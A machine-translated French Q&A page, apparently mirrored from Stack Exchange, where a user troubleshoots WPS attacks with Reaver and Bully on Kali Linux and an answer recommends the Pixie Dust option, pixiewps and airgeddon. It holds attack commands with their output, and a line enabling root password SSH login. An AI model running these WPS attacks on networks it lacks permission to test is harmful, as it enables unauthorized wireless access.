web-dev-qa-db-fra.com

Fissuration WPS à l'aide de Reaver-Bully sur Kali Linux

Mon matériel ressemble à ceci: Lenovo Laptop exécutant RHEL, et Virtual Machine Manager lançant un VM avec Kali Linux. J'ai essayé ces cartes réseau:

  • TL-WN722N
  • AWUS051NH
  • AWUS036NH

Je démarre le VM en mode direct (je n'ai pas besoin de stockage persistant) et je partage une de ces cartes réseau à la fois. Avec tout cela, j'ai exactement les mêmes résultats.

Tout d'abord, je lance ces deux lignes afin d'avoir accès via ssh pour une meilleure expérience de terminal, etc.

$ sed -i -e 's/prohibit-password/yes/g' /etc/ssh/sshd_config
$ service ssh start

Plonger dans la mise en place des interfaces réseau:

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!

  PID Name   
  963 NetworkManager
 1087 dhclient
 1534 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       rt2800usb   Ralink Technology, Corp. RT3572

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) 
        (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig  eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
lo        no wireless extensions.

root@kali:~# ifconfig wlan0mon down 
root@kali:~# iwconfig wlan0mon mode monitor 
root@kali:~# ifconfig wlan0mon up   
root@kali:~# iwconfig eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
 lo        no wireless extensions.

Et après cela, quelques découvertes:

 root@kali:~# airodump-ng wlan0mon

    BSSID    PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 XX:XX:XX:XX  -80        2        0    0   1  54e  WPA2 CCMP   MGT  NumA
 XX:XX:XX:XX  -28        2        0    0   6  54e  WPA2 CCMP   PSK  NumB 
 XX:XX:XX:XX  -81        2        0    0   11  54e  WPA2 CCMP   MGT  NumC


root@kali:~# wash -i wlan0mon    

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...


root@kali:~# wash -i wlan0mon -C

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX       1            -73        1.0               No                WiA
XX:XX       6            -27        1.0               No                WiB
XX:XX       11            -77        1.0               No                WiC

Et maintenant, la partie attaque:

root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX -vv       

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from XX:XX:XX:XX
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 11
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)

Et aussi en utilisant l'intimidateur:

root@kali:~# bully -b XX:XX:XX wlan0mon -c 11
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'wlan0mon' to channel '11'
[!] Using 'XX:XX:XX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'XX:XX:XX' on channel '11'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'TargetA' (XX:XX:XX)
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'

Je sais qu'au moins 2 de mes points d'accès au terrain de jeu sont vulnérables à l'attaque en fonction des adresses mac (pixie dust je pense appelé). J'ai réussi à les casser en utilisant un Android no name Android Android. Et cette attaque ne fonctionne avec aucune combinaison de mes cartes réseau/ni accès cible) points.

Il doit y avoir soit une configuration qui me manque, soit une compatibilité matérielle qui me manque.

Je sais que ces cartes réseau sont destinées au mode de surveillance, je suppose qu'elles devraient également prendre en charge wps, mais je ne l'ai pas encore réussi à fonctionner. Dois-je en avoir un spécifique pour pouvoir effectuer les attaques WPS?

4
Dimitris Sapikas

J'ai quelques recommandations pour vous.

Tout d'abord. Si je ne me trompe pas, vos deux Alfa sont basées sur le chipset Ralink. Vous devez savoir que les chipsets et le Reaver Ralink ont ​​des résultats terribles. Il est préférable d'utiliser l'intimidateur.

Une autre chose importante pourrait être sur Reaver d'utiliser -N (--no-nacks) argument. Essayez de l'utiliser. En utilisant ce paramètre, il n'enverra pas de messages NACK lorsque des paquets en panne sont reçus. Peut-être que cela peut vous aider, mais comme je l'ai dit sur mon premier point ... en utilisant Ralink + reaver = crap.

L'attaque Pixie Dust peut être intégrée directement sur Reaver et Bully si vous avez une certaine version ou supérieure (1.1 pour Bully et 1.5.2 pour Reaver). Donc, à partir de vos journaux, il semble que vous puissiez l'exécuter à l'aide de Reaver ... mais vous avez à nouveau le problème (Ralink blah blah blah ...). Donc, ma suggestion est de mettre à jour votre version de l'intimidateur. Sur Kali, vous pouvez obtenir la version 1.1 directement à partir des référentiels. Et puis vous pouvez l'exécuter directement en utilisant cette commande:

bully wlan0mon -b XX:XX:XX:XX:XX:XX -c 11 -d -v 3

Note1 bien sûr, vous devez également avoir installé pixiewps. Vous pouvez l'obtenir facilement via apt sur Kali, il est sur des référentiels.

Note2 Sur bully 1.1, vous pouvez augmenter le niveau de verbosité de 3 à 4. Cela ne fonctionne pas sur les versions précédentes.

Si vous êtes sûr que certains des AP sont vulnérables aux attaques WPS, vous pouvez le tester directement en utilisant -p xxxxxxxx option. Je suppose que vous êtes le propriétaire des AP, n'est-ce pas? et bien sûr, vous connaissez la broche. Vous pouvez essayer d'utiliser cette option afin de tester si vous pouvez obtenir le mot de passe. Il est utile de savoir quelle combinaison de logiciels et de chipsets fonctionne correctement.

Une dernière recommandation, essayez quelques scripts sans fil. Celui sur lequel je collabore airgeddon .

J'espère que cela aide!

6
OscarAkaElvis